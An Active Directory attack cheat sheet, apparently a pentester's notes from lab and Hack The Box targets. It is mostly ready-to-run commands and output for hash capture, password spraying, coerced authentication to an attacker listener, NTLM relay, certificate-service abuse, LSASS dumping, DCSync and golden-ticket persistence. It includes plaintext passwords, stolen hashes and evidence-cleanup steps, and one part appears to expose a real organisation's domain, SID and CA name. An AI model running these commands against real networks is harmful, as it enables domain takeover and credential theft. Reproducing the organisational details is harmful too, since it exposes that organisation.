- Reconnaissance (unauthenticated)
- lateral movement (authenticated)
- Privilege escalation
Context, assumed breached internal organization network with rogue device connected internally.
ip aGet network interface details, Identify Your IP Address & Subnetip rShow routing tablenetstat -rnView routing tableip route showGet the network range
Capture SMB, LLMNR, NetBIOS, and Kerberos traffic.
tcpdump -i eth1 -n port 53 or port 88 or port 445 # Capture DNS, Kerberos, SMB traffic
Ping sweep & Full port scan
nmap -sn 192.168.211.0/24
nmap -p- --open -sS -T4 -n -v -iL hosts-lab-net.txt
Detect Active Directory Domain
cat /etc/resolv.conf # Look for domain name
nslookup -type=SRV _ldap._tcp.dc._msdcs.lab.net
Active Directory (AD) discovery, scan common Windows ports:
sudo nmap -p 53,88,135,139,389,445,464,593,636,3268,3269,3389,5985,5986 -sV 192.168.211.0/24 --open
Capturing Hashes - Unauthenticated
-w, --wpadStart the WPAD rogue proxy server.-F, --ForceWpadAuthForce NTLM/Basic authentication on wpad.dat file retrieval. This may cause a login prompt.-v, --verboseIncrease verbosity.
sudo responder -I eth1 -v -wF
Crack NTLMv2 Hashes obtained from responder:
john --wordlist=/usr/share/wordlists/rockyou.txt captured.ntlmv2
hashcat -m 5600 -a 0 captured.ntlmv2 rockyou.txt
Get valid user accounts using RID Cycling
impacket-lookupsid anonymous@manager.htb -no-pass
Using netexec rid-brute function:
sudo nxc smb 10.129.45.217 -u 'guest' -p '' --rid-brute
Kerbrute bruteforce userenum to get list of valid users using long word list from Active Directory Kerberos service on port 88:
./kerbrute_linux_amd64 userenum --dc 10.129.45.217 -d manager.htb ./userlist.txt
Netexec smb kerberos authentication is not so clean in showing valid users, message
KDC_ERR_PREAUTH_FAILEDindicate valid user:
netexec smb dc01.manager.htb -k -u userlist.txt -p 'RandowPassword'
Note: Valid NTP clock sync is required to not get skewed time with the target Domain Controller and Kali host!
sudo ntpdate dc01.manager.htb
Input username and password input file with no brute force setting:
netexec smb manager.htb -u valid_usernames.txt -p valid_usernames.txt --no-bruteforce --continue-on-success
Validate the username using username as password:
impacket-mssqlclient manager/operator:operator@manager.htb -windows-auth
Password Spray single weak password to all usernames:
nxc smb dc2022.lab.net -u list_of_users.txt -p 'Password1' --continue-on-success
Active Directory Enumeration post-compromise AD enumeration, essential tools revealing structure of the domain.
SMB client with AD domain authentication to share:
smbclient -U levi.james@puppy.htb //10.10.11.70/DEV
NTLM authentication on DC is disabled, then to generate a kerberos authentication file on linux use
-kfor kerberos authentication
nxc smb dc.voleur.htb --generate-krb5-file voleur.htb
cat voleur.krb
nxc smb dc.voluer.htb -u ryan.naylor -p 'HollowOct31Nyt' -k
Determine the Active Directory Password Policy for assisting with cracking hashes or doing more password spray
nxc smb dc2022.lab.net -u FGFS_BusProjMgr -p 'P@ssw0rd123456' --pass-pol
Check & Scan Targets with credentials authenticated enumation.
Determine if targets vulnerable to coerce relay attacks: NXC Scan for Vulnerabilities
netexec smb dc2022.lab.net -u weakuser -p Password1 -d lab.net -M zerologon
netexec smb dc2022.lab.net -u weakuser -p Password1 -d lab.net -M nopac
netexec smb dc2022.lab.net -u weakuser -p Password1 -d lab.net -M printnightmare
netexec smb dc2022.lab.net -u weakuser -p Password1 -d lab.net -M smbghost
netexec smb dc2022.lab.net -u weakuser -p Password1 -d lab.net -M ms17-010
netexec smb dc2022.lab.net -u weakuser -p Password1 -d lab.net -M coerce_plus -o LISTENER=192.168.211.117
YouTube Video: SANS Workshop NTLM Relaying 101 Internal Pentesters Compromise Domains
Run all exploit methods at once, add the
ALWAYS=trueoption, it will stop if the underlying RPC connection reports a successful coercion.
netexec smb ca22.lab.net -u weakuser -p Password1 -d lab.net -M coerce_plus -o LISTENER=192.168.211.117 ALWAYS=true
netexec smb member2022.lab.net -u weakuser -p Password1 -d lab.net -M coerce_plus -o METHOD=PetitPotam ALWAYS=true
Scan for tampering vulnerability in Microsoft Windows when a man-in-the-middle attacker is able to successfully bypass the NTLM Message Integrity Check (MIC)
python /home/kali/Downloads/lab.net/cve-2019-1040-scanner/scan.py lab/weakuser:Password1@dc2022.lab.net
[*] CVE-2019-1040 scanner by @_dirkjan / Fox-IT - Based on impacket by SecureAuth
[*] Target dc2022.lab.net is not vulnerable to CVE-2019-1040
Look if target vulnerable to known exploits:
/home/kali/Downloads/lab.net/rpcdump.py 10.10.10.10 | grep -A 6 "spoolsv"
CA installed on the
manager.htbDomain controller exploitation:
certipy-ad find -u raven -p 'R4v3nBe5tD3veloP3r!123' -dc-ip 10.129.45.217 -stdout -vulnerable
Output show the ESC7 Vulnerability:
[!] Vulnerabilities
ESC7 : 'MANAGER.HTB\\Raven' has dangerous permissions
Certificate Templates : [!] Could not find any certificate templates
CA ESC7 Exploit Steps:
- Add owened account as an "officer", so that we can manage certificates.
certipy-ad ca -u raven@manager.htb -p 'R4v3nBe5tD3veloP3r!123' -dc-ip 10.129.45.217 -ca manager-dc01-ca -add-officer raven -debug- Now issue and manage certificates. The SubCA template can be enabled on the CA with the -enable-template flag.
certipy-ad ca -u raven@manager.htb -p 'R4v3nBe5tD3veloP3r!123' -dc-ip 10.129.45.217 -ca manager-dc01-ca -enable-template subca- Get List of certificate templates can be listed using the -list-templates flag.
certipy-ad ca -u raven@manager.htb -p 'R4v3nBe5tD3veloP3r!123' -dc-ip 10.129.45.217 -ca manager-dc01-ca -list-templates- Prerequisites for the attack fulfilled. ManageCA permission, and SubCA template enabled. Now request a certificate based on the SubCA template.
certipy-ad req -u raven@manager.htb -p 'R4v3nBe5tD3veloP3r!123' -dc-ip 10.129.45.217 -ca manager-dc01-ca -template SubCA -upn administrator@manager.htb- Manually issue the failed certificate with the ca command and the -issue-request request ID.
certipy-ad ca -u raven@manager.htb -p 'R4v3nBe5tD3veloP3r!123' -dc-ip 10.129.45.217 -ca manager-dc01-ca -issue-request 19- Retrieve the issued certificate with the
reqargument and the-retrieverequest ID.
certipy-ad req -u raven@manager.htb -p 'R4v3nBe5tD3veloP3r!123' -dc-ip 10.129.45.217 -ca manager-dc01-ca -retrieve 19- Sync Time NTP with target
sudo ntpdate -s manager.htb- administrator's PFX file in our possession, we can now utilize it for authentication.
certipy-ad auth -pfx administrator.pfx - We get NTLM NT HASH and can pass-the-hash authentication method to gain Domain Admin Access.
evil-winrm -i manager.htb -u administrator -H ae5064c2f62317332c88629e025924ef
In Active Directory Certificate Services (AD CS),
ESC7 and ESC8 are privilege escalation techniques that exploit misconfigurations in certificate templates and certificate authority settings.
These attacks allow an attacker to escalate privileges from a low-privileged user to a Domain Admin or compromise the entire domain.
Coercing Techniques:
- PetitPotam (MS-EFSR) --> Generic Machine
- PrinterBug (MS-RPRN) --> Generic Machine
- ShadowCoerce (MS-FSRVP) --> Generic Machine
- DFSCoerce (MS-DFSNM) --> Domain Controller
Force Victim to Authenticate to KALI Linux Responder listener.
Coerce techniques like PetitPotam, MS-FSRVP ShadowCoerce, and PrinterBug to force authentication and relay it.
-d, --domain DOMAINvalid domain name- positional arguments:
- listener ip address or hostname of listener
- target ip address or hostname of target
With Responder still running on Kali
192.168.211.117listener:sudo responder -I eth1 -v
run PetitiPotam and instruct the domain controller to connect to kali with the provide AD credentials:
sudo ./PetitPotam.py -u weakuser -p Password1 -d lab.net 192.168.211.117 dc2022.lab.net
Result is stolen hash for domain controller computer account: DC2022
192.168.211.133
[SMB] NTLMv2-SSP Client : 192.168.211.133
[SMB] NTLMv2-SSP Username : LAB\DC2022$
[SMB] NTLMv2-SSP Hash : DC2022$::LAB:8958d4ec02a281d0:8251A2E599D08B6602897FBD8728C707:0101000000000000004E364C1290DB01DDF22EFAFDC7F49A00000000020008004A004D003700490001001E00570049004E002D004E0035005500510032004400530046004F003300340004003400570049004E002D004E0035005500510032004400530046004F00330034002E004A004D00370049002E004C004F00430041004C00030014004A004D00370049002E004C004F00430041004C00050014004A004D00370049002E004C004F00430041004C0007000800004E364C1290DB01060004000200000008003000300000000000000000000000004000007D21B4016805DDB3F10263C3B4E2C4F4E4FF91C439EAA4136BCAA11F4E97371F0A001000000000000000000000000000000000000900280063006900660073002F003100390032002E003100360038002E003200310031002E003100310037000000000000000000
Computer accounts password Net-NTLMv2 crack impossible.
Using the stolen hash for relaying...
sudo python3 -m venv $(pwd)/exploit-venv
source $(pwd)/exploit-venv/bin/activate
python3 -m pip install coercer
coercer -h
Scan RPC to determine vulnerablity of target if they can be leveraged to coerce an authentication:
scan- Tests known methods with known working paths on all methods, and report when an authentication is received.
sudo coercer scan -t 192.168.211.133 -u weakuser -p Password1 -d lab.net -v
Next exploit the Remote Procedure Calls (RPC) on a remote machine to coerce an authentication to ntlmrelay or responder.
- OpenGraph library list BloodHound Identity integrations
- Specterops BloodHound Queries For All
- PrivHound - Enhanced Privilege Escalation Graph
- RustHound-ce
Collectors to Extract Active Directory info using Bloodhound or Rusthound:
rusthound-ce --domain certificate.htb -u lion.sk -p '!QAZ2wsx' -z
bloodhound-python -u 'weakuser' -p 'Password1' -dc dc2022.lab.net -d lab.net -c all
When one computer account is admin to another computer, SCCM Configuration Manager Computer Admin Config servers.
BloodHound Cypher Raw Queries Cheetsheet
Finding computer admin to another computer account using Bloodhound Raw Query identify this local administrator computer configuration setup:
MATCH p=(c1:Computer)-[r1:MemberOf*1..]->(g:Group)-[:AdminTo]->(c2:Computer) RETURN p
MATCH p=(c1:Computer)-[:AdminTo]->(c2:Computer) RETURN p
MATCH p=(c1:Computer)-[r1:MemberOf*1..]->(g:Group)-[r2:AdminTo]->(n:Computer) RETURN p
MATCH (c1:Computer)-[r:AdminTo|GenericAll]->(c2:Computer)
RETURN c1.name AS SourceComputer, type(r) AS AccessType, c2.name AS member2022.lab.net
Using bloodyAD to abuse
genericwriteover group, and add user to group: ParametergroupMemberis case sensitive!
bloodyAD --host puppy.htb -d puppy.htb -u levi.james -p 'KingofAkron2025!' add groupMember DEVELOPERS levi.james
The user olivia have will generic all permissions over user michael in AD:
Set new password for Michael using bloodyAD:
bloodyAD -u "olivia" -p "ichliebedich" -d "lab.net" --host dc.lab.net set password "Michael" "ichliebedich"
AD permission
ForceChangePasswordrights to change another user:
bloodyAD -u "Michael" -p "12345678" -d "lab.net" --host dc.lab.net set password "Benjamin" "ichliebedich"
bloodyAD -u mark.bbond -p '1day@atime' -d 'mirage.htb' --host dc01.mirage.htb -k get object javier.mmarshall
bloodyAD -u mark.bbond -p '1day@atime' -d 'mirage.htb' --host dc01.mirage.htb -k set password javier.mmarshall 'Password123!'
bloodyAD -u mark.bbond -p '1day@atime' -d 'mirage.htb' --host dc01.mirage.htb -k remove uac javier.mmarshall -f ACCOUNTDISABLE
Check for writable AD objects on other users.
bloodyAD -u mark.bbond -p '1day@atime' -d 'mirage.htb' --host dc01.mirage.htb -k get object javier.mmarshall | grep -i hour -a
bloodyAD -u mark.bbond -p '1day@atime' -d 'mirage.htb' --host dc01.mirage.htb -k get writable --detail
bloodyAD -u mark.bbond -p '1day@atime' -d 'mirage.htb' --host dc01.mirage.htb -k set object javier.mmarshall logonHours -v //////////////////////////// --b64
Watch out blue team use logonhours as honey pot trigger!
Group Managed Service Account (gMSA) secure domain-managed service accounts to run services across multiple servers, automatically handling complex passwords.
nxc dump gMSA stealing the encrypted password blob (msDS-ManagedPassword) NTLM hash
nxc ldap <ip> -u javier.mmarshall -p '1day@atime' -k --gmsa
Logon with stolen NTLM hash to do tgt ticket login:
getTGT.py -hashes ':738eeff47da231dec805583638b8a91f' 'mirage.htb/mirage-service$'
KRB5CCNAME=mirage-service\$.ccache bloodyAD --host dc01.mirage.htb -d mirage.htb -u 'mirage-service$' -k get writable --detail
Output shows permissions where user have
WRITEpermission on other user objects such as SPNuserPrincipalName.
After locating PasswordSafe backup file and cracking password with
pwsafe2john Backup.psafe3, Emliy password found. Emily has AD write access to Ethan user account, force targeted kerberoasting attack adding SPN:
targetedKerberoast.py prints the kerberoast hash, and deletes the temporary SPN that was set for the operation.
sudo ntpdate dc.administrator.htb
python targetedKerberoast.py -u "emily" -p "UXLCI5iETUsIBoFVTj8yQFKoHjXmb" -d "administrator.htb" --dc-ip 10.129.44.50
NTLM relay attacks to gain access to Spooler, SMB, LDAP, and AD resources.
When a victim tries to resolve a non-existent hostname, it will send their NTLM hash.
-tf TARGETSFILEFile that contains targets by hostname or full URL, one per line
targetfile-dns-hosts-names.txt:
dc2022.lab.net
ca22.lab.net
member2022.lab.net
ws11.lab.net
Start
impacket-ntlmrelayx, on Kali attacker, make sure responder not running.
impacket-ntlmrelayx -t member2022.lab.net -smb2support
Running
impacket-ntlmrelayxit will redirect incoming authentication request to targetmember2022.lab.netand usesmb2support.
Run PetitPotam and instruct it to contact domain controller
dc2022with authentication details, to send logon to Kali192.168.211.117where NTLMRELAYX will forward on to member2022 server.
python3 PetitPotam.py -u weakuser -p Password1 -d lab.net 192.168.211.117 dc2022.lab.net
Successfully domping SAM hashes for host member2022 because DC2022 is admin to the member server. output:
*] Target system bootKey: 0x427aff60178424877f0f652e0d2cf307
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:ead64f747aa274494d65957f8593d0f1:::
[*] Done dumping SAM hashes for host: member2022.lab.net
Abuse the stolen NTLM hash with pass-the-hash technique:
wget https://raw.githubusercontent.com/fortra/impacket/refs/heads/master/examples/wmiexec.py
python3 wmiexec.py -hashes :e19ccf75ee54e06b06a5907af13cef42 Administrator@member2022.lab.net
YouTube Video: Hactivity - The Power of Coercion Techniques in Windows Environments
Privilege Escalation using cross session relay attack with current user session logged in on windows target:
on Kali
sudo socat -v TCP-LISTEN:135,fork,reuseaddr TCP:{{KALI-IP}}:9999
On low privilege compromised host:
.\RemotePotato0.exe -m 2 -x <KALI IP> -s 1
Stolen obtain NTLMv2 Hash received
hashcat -m 5600 NetNTLMv2.hash rockyou.txt
Quick export of kerberoasting accounts from Active Directory output to file:
nxc ldap dc.puppy.htb -u levi.james -p 'KingofAkron2025!' --kerberoasting krb.txt
Unconstrained Delegation
Now we coerce the Domain controller to connect to member server to make sure there is tickets to steal:
python3 PetitPotam.py -u weakuser -p Password1 -d lab.net member2022.lab.net dc2022.lab.net
repeat PetitPotam several times to make sure tickets on member2022 server to dump: Typical Output from PetitPotam:
Trying pipe lsarpc
[-] Connecting to ncacn_np:dc2022.lab.net[\PIPE\lsarpc]
[+] Connected!
[+] Binding to c681d488-d850-11d0-8c52-00c04fd90f7e
[+] Successfully bound!
[-] Sending EfsRpcOpenFileRaw!
[-] Got RPC_ACCESS_DENIED!! EfsRpcOpenFileRaw is probably PATCHED!
[+] OK! Using unpatched function!
[-] Sending EfsRpcEncryptFileSrv!
[+] Got expected ERROR_BAD_NETPATH exception!!
[+] Attack worked!
With the previously dumpped hashes through the relay attack, Using nxc, now dump the LSASS from member2022 server after forcing dc2022 to make connections to member2022 with PetitPotam:
netexec smb member2022.lab.net -u Administrator -H e19ccf75ee54e06b06a5907af13cef42 --local-auth -M nanodump
Netexec produce nanodump and local file on kali
/tmp/MEMBER2022_64_MEMBER2022.log. Using pypekatz on kali we can parse the log file, and dump the kerberos tickets-k.
-k, --kerberos-dirKERBEROS_DIR Save kerberos tickets to a directory.
pypykatz lsa minidump /tmp/MEMBER2022_64_MEMBER2022.log -k /home/kali/Downloads/lab.net/kerberos > /dev/null
Above do not dump the hashes but just the kerberos tickets.
After executing netexec as admin with hash as authentication, the nanodump module produced output of lsass,that we parsed with pypykatz to extract the Kerberos tickets as
kirbifiles on Kali.
impacket-ticketConverterperform action to convert the kerberos ticket files from kirbi to ccache to use in authentication to domain controller from Kali.
Most valuable Golden ticket (User ticket) iskrbtgt
impacket-ticketConverter 'TGT_LAB.NET_DC2022$_krbtgt_LAB.NET_fcecdbad.kirbi' krbtgt.ccache
Confirming a Kerberos Ticket is in Memory Using
klist.
sudo apt-get install krb5-user
klist -c krbtgt.ccache
export KRB5CCNAME=/home/kali/Downloads/lab.net/kerberos/krbtgt.ccache
klist
From Kali Linux using the authenticated ccache kirbi ticket to dump the hash of krbtgt taking control of AD.
Impacket tool used to perform a DCSync attack from a Linux-based host. HackTheBox Academy - Attack Domain - from Linux
../secretsdump.py -k -no-pass -just-dc-user krbtgt DC2022\$@DC2022.LAB.NET
../secretsdump.py -k -no-pass -just-dc-user krbtgt DC2022\$@DC2022.LAB.NET
Output from secretsdump:
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:a1ba41b8c05759df666c27b0822b2401:::
[*] Kerberos keys grabbed
krbtgt:aes256-cts-hmac-sha1-96:fc8b733eb409ce41345eebf6976329e97bcae86e4bd605c5d7d01ac3e81b1346
krbtgt:aes128-cts-hmac-sha1-96:bd36d603de4589c5b0e423257cf70a01
krbtgt:des-cbc-md5:8c315231b668dc8f
[*] Cleaning up...
Validate hash:
secretsdump.py 'lab.net/krbtgt@dc2022.lab.net' -hashes :a1ba41b8c05759df666c27b0822b2401
Allowing the crafting tickets for Persistence in Active Directory.
Active Directory Ticket Exploit Techniques:
- Golden Ticket attacks target the KRBTGT account (which resides on domain controllers) can forge TGTs for any user in the Active Directory domain
- Silver Ticket attacks involve an attacker compromising a service account or a computer account to obtain its password hash
- Diamond Ticket Attack refers to the reuse of legitimate, but potentially expired or soon-to-expire, TGTs that might still be cached
- Pass-the-Ticket (PtT) difference from Golden/Silver, do not involve forging tickets but rather using legitimate ones obtained and relaying or coerce
- Kerberoasting attacks service accounts associated with a Service Principal Name (SPN) to crack the password hash offline
- AS-REP Roasting target user account that have the "Do not require Kerberos pre-authentication" option enabled crack hash Offline
- Delegation Abuse account with delegation privileges is compromised. Attackers might be able to pivot through delegated services to reach targets
- Trust Ticket Attacks multiple Active Directory forests with trust relationships
The krbtgt must be changed now to loose hacker persistance with the obtained KRBTGT tickets hash.
With krbtgt NTLM hash from secretsdump.py, you can craft a Golden Ticket to create an administrative user in the domain and escalate privileges.
/usr/bin/impacket-lookupsid -k -no-pass DC2022\$@DC2022.lab.net
Output the Domain SID:
S-1-5-21-1153563262-525900357-1151977077
Crafting:
python3 ../ticketer.py -nthash a1ba41b8c05759df666c27b0822b2401 -domain-sid S-1-5-21-1153563262-525900357-1151977077 -domain lab.net -groups 512 hackerx
python3 ../ticketer.py -aesKey fc8b733eb409ce41345eebf6976329e97bcae86e4bd605c5d7d01ac3e81b1346 -domain-sid S-1-5-21-1153563262-525900357-1151977077 -domain lab.net -groups 512 hackerp
python3 ../ticketer.py -nthash a1ba41b8c05759df666c27b0822b2401 -domain-sid S-1-5-21-1153563262-525900357-1151977077 -domain lab.net -groups 512 hacker2
export KRB5CCNAME=hacker2.ccache
klist
impacket-psexec lab.net/hacker2@dc2022.lab.net -k -no-pass -target-ip dc2022.lab.net
Testing persistance:
export KRB5CCNAME=/home/kali/Downloads/lab.net/kerberos/hackerp.ccache
impacket-psexec lab.net/hackerp@dc2022.lab.net -k -no-pass -target-ip dc2022.lab.net
ESC8 Certified Pre-Owned
Domain Controller --> NTLM Authentication --> NTLMRELAYX --> RELAY Request --> ADCS Web Enrollment Site
Type of Certificate Authority is single member server of the domain lab.net.
CA22.lab.net role for an Enterprise CA and Root CA at the same time.
Windows Server 2022 Certificate Authority Roles and Features installed:
- kali attack relay [192.168.211.117]
- dc2022.lab.net [192.168.211.133]
- CA22.lab.net [192.168.211.137]
- Target CA
- Distinguished name:
CN=lab-CA22-CA-1,DC=lab,DC=net - Certificate Database file path:
C:\Windows\system32\CertLog - ADCS Services:
- Certification Authority
- Certification Authority Web enrollment
- Online Responder (OCSP)
- Network Device Enrollment Web Service (NDES) - Service account
LAB\WEBSVC - Certificate Enrollment Web Service
- Target CA:
CA22.lab.net\lab-CA22-CA-1
- Target CA:
- Type of Authentication - Windows Integrated Authentication
- Certificate Enrollment Web Service (CES) service account:
LAB\WEBSVC
IIS CertSrv Authentication:
Login to validate AD CS web site loads on kali after entering
LAB\auserand passwordP@ssw0rd
Update Domain Controller Default Group Policy (GPO) - Public Key Policies - Certificate Services Client - Auto Enroll
Running curl -I http://CA22.lab.net/certsrv/certfnsh.asp output below:
HTTP/1.1 401 Unauthorized
Content-Length: 1293
Content-Type: text/html
Server: Microsoft-IIS/10.0
WWW-Authenticate: Negotiate
WWW-Authenticate: NTLM
X-Powered-By: ASP.NET
Date: Tue, 12 Aug 2025 18:46:55 GMT
Observe
NTLMis allowed based on the headerWWW-Authenticate
Find all possible internal certificate authroity vulnerabilities to exploit:
certipy-ad find -u juanb@lab.net -stdout -vulnerable -p 'P@ssw0rd123!'
To Determine if the AD CS is vulnerbale to ESC8 technique:
Validate the compromised user account password not expired if errors running certipy-ad.
nc -vz 192.168.211.133 389
sudo ntpdate -s dc2022.lab.net
ldapwhoami -x -H ldap://192.168.211.133 -D 'auser@lab.net' -w 'P@ssw0rd'
ldapwhoami -x -H ldap://192.168.211.133 -D 'administrator@lab.net' -w 'P@ssw0rd'
dig @192.168.211.133 dc2022.lab.net +short
certipy-ad find -u auser@lab.net -p 'P@ssw0rd' -dc-ip 192.168.211.133 -ns 192.168.211.133 -ldap-scheme ldap -enabled -vulnerable
certipy-ad find \
-u 'auser@lab.net' -p 'P@ssw0rd' \
-dc-ip 192.168.211.133 -dc-host dc2022.lab.net \
-scheme ldap -ns 192.168.211.133 \
-enabled --vulnerable -v -debug
certipy-ad find \
-u 'administrator@lab.net' -p 'P@ssw0rd' \
-dc-ip 192.168.211.133 -dc-host dc2022.lab.net \
-scheme ldap -ns 192.168.211.133 \
-enabled --vulnerable -v -debug
Start NTLM Relay on Kali attacker in Virtual Python Environment.
Due packages cryptography utils.py and module OpenSSL.crypto PKCS12, issues:
python3 -m venv $(pwd)/relay2old
source $(pwd)/relay2old/bin/activate
source ~/Downloads/lab.net/ca_esc8/relay2old/bin/activate
python -m pip install --upgrade pip
python -m pip install 'impacket==0.11.0' 'pyOpenSSL==23.2.0' 'cryptography==41.0.7'
python -m pip install 'setuptools<81'
"$VIRTUAL_ENV/bin/ntlmrelayx.py" -h
mkdir -p $(pwd)/loot_adcs
sudo ntpdate -s dc2022.lab.net
"$VIRTUAL_ENV/bin/ntlmrelayx.py" -smb2support -t http://CA22.lab.net/certsrv/certfnsh.asp \
--adcs --template DomainController /
--lootdir $(pwd)/loot_adcs/ -debug --template DomainCotroller--adcs- Instruct ntlmrelayx that target is AD CS and to save certificate and private key files.
Force or trick Domain controller to authenticate to us using DFSCoerce.py
- kali attack relay [192.168.211.117]
- dc2022.lab.net [192.168.211.133]
- CA22.lab.net [192.168.211.137]
python dfscoerce.py -u auser@lab.net -p 'P@ssw0rd' 192.168.211.117 dc2022.lab.net
Success after Using a clean
venvwith impacket 0.11.0 and pyOpenSSL 23.2.0.
Recap - low privilege active directory users can interact with these windows protocols:
- MS-RPRN (Print Spooler Service)
- MS-FSRVP (File Share Shadow Copy Service)
- MS-EFSRPC (Encrypting File System)
- MS-DFSNM (Distributed File System)
Save the Certificate as a PFX File from the base64 output.
paste the Base64 output here in Filenano dc2022.pfx.b64
Get the full PFX with private key + cert.
base64 -d dc2022.pfx.b64 > dc2022.pfx
Run Certipy to get a TGT using the PFX:
certipy-ad auth -pfx dc2022.pfx \
-dc-ip 192.168.211.133 -username 'DC2022$' \
-domain 'lab.net'
Saved Kerberos ticket (DC2022.ccache) in your current folder.
Obtained a valid TGT forDC2022$and its NT hash.
Next step: use that ticket to perform DCSYNC.
Point tools to TGT
DCSYNC with Impacket Kerberos auth-k
Using the tool gettgtpkinit.py
export KRB5CCNAME=/home/kali/Downloads/lab.net/ca_esc8/dc2022.ccache
klist
python gettgtpkinit.py -cert-pfx dc2022.pfx "lab.net/DC2022\$" "extracted_tgt_file.ccache" -dc-ip 192.168.211.133
export KRB5CCNAME=/home/kali/Downloads/lab.net/ca_esc8/extracted_tgt_file.ccache
klist
impacket-secretsdump -k 'lab.net/DC2022$@dc2022.lab.net' -just-dc-user administrator -dc-ip 192.168.211.133
impacket-secretsdump -k 'lab.net/DC2022$@dc2022.lab.net' -dc-ip 192.168.211.133
# at prompt for password JUST PRESS ENTER to continueSuccessfully performed DCSYNC Attack.
After performing DCSYNC dump of all hashes, use hashes to gain WINRM admin access with pass-the-hash (PTH)
evil-winrm -i 192.168.211.133 -u Administrator -H e19ccf75ee54e06b06a5907af13cef42
With a AD user that have
DCSYNCpermissions:
Secretsdump script in the Impacket framework that can also export the hash of users on the domain controller through the DCSync rights.
Remotely connect to the domain controller then export the hash of local accounts from the registry, through Dcsync or from theNTDS.ditfile:
impacket-secretsdump "Administrator.htb/ethan:limpbizkit"@"dc.lab.net"
evil-winrm -i lab.net -u administrator -H "3dc553ce4b9fd20bd016e098d2d2fd2e"
Vulnerability Requirements checks to
findpossible attack paths:
certipy-ad find -u juanb@lab.net -stdout -vulnerable -p 'P@ssw0rd!' | grep -ie 'esc\|enabled\|template\|Certificate Authorities'
Validate target
accountto request certificate for:
certipy-ad account -u juanb@lab.net -p 'P@ssw0rd!' -user EXCH2010INST -dc-host prd-hodc02.lab.net -dns lab.net read
Output include objectSid for later and upn.
[*] Reading attributes for 'EXCH2010INST':
cn : EXCH2010INST
distinguishedName : CN=EXCH2010INST,OU=DomainAdmins,OU=Domain Security Accounts,DC=ho,DC=FosLtd,DC=co,DC=za
name : EXCH2010INST
objectSid : S-1-5-21-1177238915-515967899-682003330-60545
sAMAccountName : EXCH2010INST
userPrincipalName : EXCH2010INST@lab.net
userAccountControl : 66048
whenCreated : 2012-09-20T14:13:17+00:00
whenChanged : 2025-08-14T17:58:30+00:00
Request certificate:
certipy-ad req -u juanb@lab.net -p 'P@ssw0rd!' -dc-host prd-hodc02.lab.net -dns lab.net -target 'lab.net' -ca 'FOSCHINI Issuing CA01' -template '18-Months-WebClientandServer' -upn 'EXCH2010INST@lab.net' -sid 'S-1-5-21-1177238915-515967899-682003330-60545'
Validate PFX certificate authentication:
nxc smb prd-hodc02.lab.net --pfx-cert exch2010inst_ho.pfx -u EXCH2010INST
Gain Control over a "Victim" Account's UPN, attacker needs the ability to modify the userPrincipalName (UPN) attribute on the "victim" account.
Need GenericWrite or WriteProperty permissions on the victim account UPN object.
The victim account must also be able to enroll for a client authentication certificate.
getTGT.py -hashes ':738eeff47da231dec805583638b8a91f' 'mirage.htb/mirage-service$'
KRB5CCNAME=mirage-service\$.ccache certipy find -vulnerable -u 'mirage-service$@mirage.htb' -k -dc-ip 10.10.11.78 -stdout -target dc01.mirage.htb
certipy find -vulnerable -u 'mark.bbond@mirage.htb' -p '1day@atime' -k -dc-ip 10.10.11.78 -stdout -target dc01.mirage.htb
Force Targeted Kerberoasting by setting SPN to
dc01$, request certificate, and get machine account LDAP shell, result ESC10 exploit success.
KRB5CCNAME=mirage-service\$.ccache bloodyad -k -d mirage.htb -H dc01.mirage.htb set object mark.bbond userPrincipalNae -v 'dc01$@mirage.htb'
certipy req -u mark.bbond@mirage.htb -p '1day@atime' -k -dc-ip 10.10.11.78 -target dc01.mirage.htb -ca mirage-DC01-CA -template 'User'
cat dc01.pfx
KRB5CCNAME=mirage-service\$.ccache bloodyad -k -d mirage.htb -H dc01.mirage.htb set object mark.bbond userPrincipalNae -v 'DoNOTMatchUserSPN'
certipy auth -pfx dc01.pfx -dc-ip 10.10.11.78 -ldap-shell
$ whoami
set_rbcd dc01$ mirage-service$
getTGT.py -hashes ':738eeff47da231dec805583638b8a91f' 'mirage.htb/mirage-service$'
KRB5CCNAME=mirage-service\$.ccache getST.py -spn 'http/dc01.mirage.htb' -impersonate dc01$ 'mirage.htb/mirage-service' -no-pass
KRB5CCNAME=dc01\$@http_dc01.mirage.htb@MIRAGE.HTB.ccache secretsdump.py -no-pass -k dc01.mirage.htb -just-dc-ntlm
psexec.py -k -hashes :7be6d4f3c2b9c0e3560f5a29eeb1afb3 'mirage.htb/administrator@dc01.mirage.htb'
type flag.txt
Resource base constrained delegation able to create on behalf of set S4U2Proxy ^^
Setup the relay
sudo ./krbrelayx.py --target http://CA22.lab.net/certsrv -ip 192.168.211.117 --victim dc2022.lab.net --adcs --template Machine
Run mitm6
sudo mitm6 --domain domain.local --host-allowlist target.domain.local --relay CA.domain.local -v4
sudo nmap -6 dc2022.lab.net
impacket-ntlmrelayx -6 -t ldaps://192.168.1.116 -wh fakewpad.lab.net -l dumpped-lootinfo
sudo mitm6 -i eth1 -d lab.net
✅ Security tools focus on IPv4, leaving IPv6 unmonitored
✅ IPv6 auto-configures on many Windows/Linux hosts
✅ MITM6 attacks force authentication over IPv6
✅ NTLM relay works seamlessly over IPv6
✅ IPv6 tunnels bypass network segmentation
Restore deleted user in Active Directory if the password known, from Linux remote host. Set SPN to do forced kerberoasting by setting SPN on target account to get hash and crack offline. Login with kerberos using ccache evil-winrm method.
- TargetedKerberost to gain access to the WinRM Account
bloodyAD -d voleur.htb --host dc.voleur.htb -u svc_ldap -p 'M1XyC9pW7qT5Vn' -k set object svc_wintm servicePrincipalName -v 'HTTP/SkippyPeanut'
- Extract the created hash for targeted kerberoast account
nxc ldap dc.voleur.htb -u svc_ldap -p 'M1XyC9pW7qT5Vn' --kerberoast hash.out -k- Crack WinRM account password
hashcat -m 13100 hash.out rockyou.txt
- Cleanup remove SPN evidence remove
bloodyAD -d voleur.htb --host dc.voleur.htb -u svc_ldap -p 'M1XyC9pW7qT5Vn' -k set object svc_wintm servicePrincipalName- Validate access to winrm service, that only support NTLM authentication.
